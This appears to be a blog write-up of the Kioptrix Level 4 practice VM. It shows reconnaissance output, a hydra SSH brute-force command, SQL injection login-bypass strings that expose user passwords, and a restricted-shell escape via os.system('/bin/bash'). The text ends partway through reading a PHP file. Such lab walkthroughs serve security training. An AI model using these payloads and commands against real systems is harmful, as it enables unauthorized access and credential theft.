Pages

Tuesday 16 August 2016

Kioptrix Level 4


This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of Kioptrix Level 4 (1.3) vulnarable VM: 
http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar

Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                             
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.              
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.              
 192.168.180.136 00:0c:29:08:fb:c7      1      60  VMware, Inc.              
 192.168.180.254 00:50:56:f4:3f:7c      1      60  VMware, Inc.  

nmap -sV -T4 -O -F --version-light 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:29 EDT
Nmap scan report for 192.168.180.136
Host is up (0.00020s latency).
Not shown: 65 closed ports, 31 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:31 EDT
NSE: Loaded 132 scripts for scanning.
<omited>
Host is up, received arp-response (0.00021s latency).
Scanned at 2016-07-05 08:31:51 EDT for 33s
Not shown: 566 closed ports, 430 filtered ports
Reason: 566 resets and 430 no-responses
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJQxDWMK4xxdEEdMA0YQLblzXV5xx6slDUANQmyouzmobMxTcImV1OfY9vB2LUjJwSbtuPn/Ef7LCik29SLab6FD59QsJKz3tOfX1UZJ9FeoxPhoVsfk+LDM4FbQxo0pPYhlQadVHAicjUnONl5WaaUEYuelAoU36v2wOKKDe+kRAAAAFQDAmqYNY1Ou7o5qEfZx0e9+XNUJ2QAAAIAt6puNENxfFnl74pmuKgeQaZQCsPnZlSyTODcP961mwFvTMHWD4pQsg0j6GlPUZrXUCmeTcNqbUQQHei6l8U1zMO4xFYxVz2kkGhbQAa/FGd1r3TqKXu+jQxTmp7xvNBVHoT3rKPqcd12qtweTjlYKlcHgW5XL3mR1Nw91JrhMlAAAAIAWHQLIOjwyAFvUhjGqEVK1Y0QoCoNLGEFd+wcrMLjpZEz7/Ay9IhyuBuRbeR/TxjitcUX6CC58cF5KoyhyQytFH17ZMpegb9x29mQiAg4wK1MGOi9D8OU1cW/COd/E8LvrNLxMFllatLVscw/WXXTi8fFmOEzkGsaRKC6NiQhDlg==
|   2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApA/UX2iq4JYXncTEDfBoyJWguuDkWDvyw4HlLyc1UBT3Pn2wnYLYa0MjwkBtPilmf5X1zK1z3su7oBEcSEt6o7RzDEUbC1O6nRvY4oSKwBD0qLaIHM1V5CZ+YDtLneY6IriJjHJ0DgNyXalPbQ36VZgu20o9dH8ItDkjlZTxRHPE6RnPiD1aZSLo452LNU3N+/2M/ny7QMvIyPNkcojeZQWS7RRSDa2lEUw1X1ECL6zCMiWC0lhciZf5ieum9MnATTF3dgk4BnCq6dfdEvae0avSypMcs6no2CJ2j9PPoAQ1VWj/WlAZzEbfna9YQ2cx8sW/W/9GfKA5SuLFt1u0iQ==
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=7/5%OT=22%CT=1%CU=33742%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=577BA8D8%P=i586-pc-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CF%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B
OS:4ST11NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0
OS:)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6
OS:%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN
OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.004 days (since Tue Jul  5 08:27:17 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 51861/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 63161/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 12408/udp): CLEAN (Failed to receive data)
|   Check 4 (port 10447/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2016-07-05T11:32:22-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.180.136

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.71 seconds
           Raw packets sent: 1450 (64.546KB) | Rcvd: 586 (24.154KB)

nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:34 EDT
<omited some large info>
Scanned at 2016-07-05 08:34:11 EDT for 1193s
Not shown: 954 closed ports
Reason: 954 port-unreaches
PORT      STATE         SERVICE     REASON              VERSION
<omited>
137/udp   open          netbios-ns  udp-response ttl 64 Microsoft Windows XP netbios-ssn
<omited>
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.01%E=4%D=7/5%OT=%CT=%CU=2%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=577BADEC%P=i586-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: KIOPTRIX4; OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.180.136

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1193.64 seconds
           Raw packets sent: 1710 (50.767KB) | Rcvd: 1046 (60.396KB)

dirb http://192.168.180.136

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Tue Jul  5 08:57:06 2016
URL_BASE: http://192.168.180.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                        

---- Scanning URL: http://192.168.180.136/ ----
+ http://192.168.180.136/cgi-bin/ (CODE:403|SIZE:330)                        
==> DIRECTORY: http://192.168.180.136/images/                                
+ http://192.168.180.136/index (CODE:200|SIZE:1255)                          
+ http://192.168.180.136/index.php (CODE:200|SIZE:1255)                      
==> DIRECTORY: http://192.168.180.136/john/                                  
+ http://192.168.180.136/logout (CODE:302|SIZE:0)                            
+ http://192.168.180.136/member (CODE:302|SIZE:220)                          
+ http://192.168.180.136/server-status (CODE:403|SIZE:335)                  
                                                                             
---- Entering directory: http://192.168.180.136/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)
                                                                             
---- Entering directory: http://192.168.180.136/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)
                                                                             
-----------------
END_TIME: Tue Jul  5 08:57:07 2016
DOWNLOADED: 4612 - FOUND: 6


wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.136/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.136/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request    
==================================================================

00540:  C=403     10 L      33 W    330 Ch  "cgi-bin/"
..."
01341:  C=200     45 L      94 W   1255 Ch  "index"
..."
01349:  C=301      9 L      31 W    358 Ch  "images"
..."
01609:  C=302      0 L       0 W      0 Ch  "logout"
..."
01726:  C=302      1 L      22 W    220 Ch  "member"
..."
01745:  C=301      9 L      31 W    356 Ch  "john"
..."
02311:  C=301      9 L      31 W    358 Ch  "robert"
..."
03035:  C=404      9 L      35 W    324 Ch  "t-bone"..."^C

nbtscan 192.168.180.136
Doing NBT name scan for addresses from 192.168.180.136

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.180.136  KIOPTRIX4        <server>  KIOPTRIX4        00:00:00:00:00:00

root@kali:/# enum4linux -a 192.168.180.136
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul  5 09:06:47 2016

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.180.136
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.180.136    |
 ======================================================= 
[+] Got domain/workgroup name: WORKGROUP

 =============================================== 
|    Nbtstat Information for 192.168.180.136    |
 =============================================== 
Looking up status of 192.168.180.136
KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

 ======================================== 
|    Session Check on 192.168.180.136    |
 ======================================== 
[+] Server 192.168.180.136 allows sessions using username '', password ''

 ============================================== 
|    Getting domain SID for 192.168.180.136    |
 ============================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================= 
|    OS information on 192.168.180.136    |
 ========================================= 
[+] Got OS info for 192.168.180.136 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.180.136 from srvinfo:
KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id     : 500
os version      : 4.9
server type     : 0x809a03

 ================================ 
|    Users on 192.168.180.136    |
 ================================ 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

 ============================================ 
|    Share Enumeration on 192.168.180.136    |
 ============================================ 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server               Comment
---------            -------
KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

Workgroup            Master
---------            -------
---- ----------------
WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.180.136
//192.168.180.136/print$ Mapping: DENIED, Listing: N/A
//192.168.180.136/IPC$ [E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

 ======================================================= 
|    Password Policy Information for 192.168.180.136    |
 ======================================================= 

[+] Attaching to 192.168.180.136 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] KIOPTRIX4
[+] Builtin

[+] Password Info for Domain: KIOPTRIX4

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================= 
|    Groups on 192.168.180.136    |
 ================================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================== 
|    Users on 192.168.180.136 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
<omited>
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
<omited>
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
<omited>
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
<omited>
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
<omited>

 ================================================ 
|    Getting printer info for 192.168.180.136    |
 ================================================ 
No printers returned.


enum4linux complete on Tue Jul  5 09:06:53 2016

root@kali:/# smbclient -N -L 192.168.180.136
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Server               Comment
---------            -------
KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

Workgroup            Master
---------            -------
-----------------------------------------
WORKGROUP            KIOPTRIX4

This just wasted my time:
hydra -l loneferret -P darkc0de.lst 192.168.180.136 ssh

So I left it and continued:
http://192.168.180.136/john/

Let's try the following for password:
' OR '1'='1
space at the end of the next query:
' OR '1'='1' -- 
' OR '1'='1' ({
' OR '1'='1' /*

What we get is:
Member's Control Panel
Username : john
Password : MyNameIsJohn

Username  robert
Password  ADGAdsafdfwt4gadfga==
' OR 1=1 #


SSH password is the same so let's try:
ssh john@192.168.180.136
The authenticity of host '192.168.180.136 (192.168.180.136)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.180.136' (RSA) to the list of known hosts.
john@192.168.180.136's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands

john:~$ 

john:~$ sudo su
*** forbidden sudo -> sudo su

cd /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

*** forbidden path -> "/"
*** Kicked out
Connection to 192.168.180.136 closed.

Haha, well. Let us try once more.

Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

echo os.system('/bin/bash')

john@Kioptrix4:/home/loneferret$ ls -la
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell

john@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

cat debian_version
lenny/sid

john@Kioptrix4:/etc/ssh$ ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1692 ?        Ss   11:22   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   11:22   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   11:22   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   11:22   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   11:22   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   11:22   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   11:22   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   11:22   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   11:22   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   11:22   0:00 [kacpi_notify]
root       170  0.0  0.0      0     0 ?        S<   11:22   0:00 [kseriod]
root       209  0.0  0.0      0     0 ?        S    11:22   0:00 [pdflush]
root       210  0.0  0.0      0     0 ?        S    11:22   0:00 [pdflush]
root       211  0.0  0.0      0     0 ?        S<   11:22   0:00 [kswapd0]
root       253  0.0  0.0      0     0 ?        S<   11:22   0:00 [aio/0]
root      1465  0.0  0.0      0     0 ?        S<   11:22   0:00 [ata/0]
root      1468  0.0  0.0      0     0 ?        S<   11:22   0:00 [ata_aux]
root      1475  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_0]
root      1481  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_1]
root      1494  0.0  0.0      0     0 ?        S<   11:22   0:00 [ksuspend_usbd]
root      1499  0.0  0.0      0     0 ?        S<   11:22   0:00 [khubd]
root      2362  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_2]
root      2604  0.0  0.0      0     0 ?        S<   11:22   0:00 [kjournald]
root      2772  0.0  0.0   2104   704 ?        S<s  11:22   0:00 /sbin/udevd --d
root      3078  0.0  0.0      0     0 ?        S<   11:22   0:00 [kgameportd]
root      3216  0.0  0.0      0     0 ?        S<   11:22   0:00 [kpsmoused]
root      4540  0.0  0.0   1716   492 tty4     Ss+  11:22   0:00 /sbin/getty 384
root      4541  0.0  0.0   1716   492 tty5     Ss+  11:22   0:00 /sbin/getty 384
root      4545  0.0  0.0   1716   492 tty2     Ss+  11:22   0:00 /sbin/getty 384
root      4546  0.0  0.0   1716   492 tty3     Ss+  11:22   0:00 /sbin/getty 384
root      4552  0.0  0.0   1716   492 tty6     Ss+  11:22   0:00 /sbin/getty 384
syslog    4589  0.0  0.0   1936   648 ?        Ss   11:22   0:00 /sbin/syslogd -
root      4608  0.0  0.0   1872   540 ?        S    11:22   0:00 /bin/dd bs 1 if
klog      4610  0.0  0.1   3160  2048 ?        Ss   11:22   0:00 /sbin/klogd -P
root      4629  0.0  0.0   5316   988 ?        Ss   11:22   0:01 /usr/sbin/sshd
root      4685  0.0  0.0   1772   524 ?        S    11:22   0:00 /bin/sh /usr/bi
root      4727  0.0  1.5 126988 16276 ?        Sl   11:22   0:00 /usr/sbin/mysql
root      4729  0.0  0.0   1700   556 ?        S    11:22   0:00 logger -p daemo
root      4802  0.0  0.1   6532  1356 ?        Ss   11:22   0:00 /usr/sbin/nmbd
root      4804  0.0  0.2  10108  2540 ?        Ss   11:22   0:00 /usr/sbin/smbd
root      4818  0.0  0.0  10108  1024 ?        S    11:22   0:00 /usr/sbin/smbd
root      4819  0.0  0.1   8084  1340 ?        Ss   11:22   0:00 /usr/sbin/winbi
root      4839  0.0  0.1   8208  1704 ?        S    11:22   0:00 /usr/sbin/winbi
daemon    4840  0.0  0.0   1984   420 ?        Ss   11:22   0:00 /usr/sbin/atd
root      4851  0.0  0.0   2104   884 ?        Ss   11:22   0:00 /usr/sbin/cron
root      4873  0.0  0.5  20464  6196 ?        Ss   11:22   0:00 /usr/sbin/apach
dhcp      4922  0.0  0.0   2440   764 ?        Ss   11:22   0:00 dhclient eth1
root      4929  0.0  0.0   1716   492 tty1     Ss+  11:22   0:00 /sbin/getty 384
root      4944  0.0  0.0   8084   872 ?        S    11:32   0:00 /usr/sbin/winbi
root      4945  0.0  0.1   8092  1264 ?        S    11:32   0:00 /usr/sbin/winbi
www-data  5608  0.0  0.3  20464  3276 ?        S    13:32   0:00 /usr/sbin/apach
root      5626  0.0  0.3  11360  3724 ?        Ss   13:38   0:00 sshd: john [pri
john      5628  0.0  0.1  11516  1860 ?        S    13:38   0:00 sshd: john@pts/
john      5629  0.0  0.3   5892  3816 pts/0    Ss   13:38   0:00 python /bin/ksh
www-data  5640  0.0  0.3  20464  3276 ?        S    13:41   0:00 /usr/sbin/apach
www-data  5641  0.0  0.3  20464  3276 ?        S    13:42   0:00 /usr/sbin/apach
www-data  5642  0.0  0.3  20464  3276 ?        S    13:42   0:00 /usr/sbin/apach
www-data  5643  0.0  0.3  20464  3276 ?        S    13:43   0:00 /usr/sbin/apach
john      5653  0.0  0.0   1772   480 pts/0    S    13:44   0:00 sh -c /bin/bash
john      5654  0.0  0.2   5432  2852 pts/0    R    13:44   0:00 /bin/bash
john      5749  0.0  0.0   2644  1012 pts/0    R+   14:00   0:00 ps -aux

MySQL is running as root.

john@Kioptrix4:/var/www$ cat checklogin.php   
<?php
ob_start();
$host="localhost"; // Host name
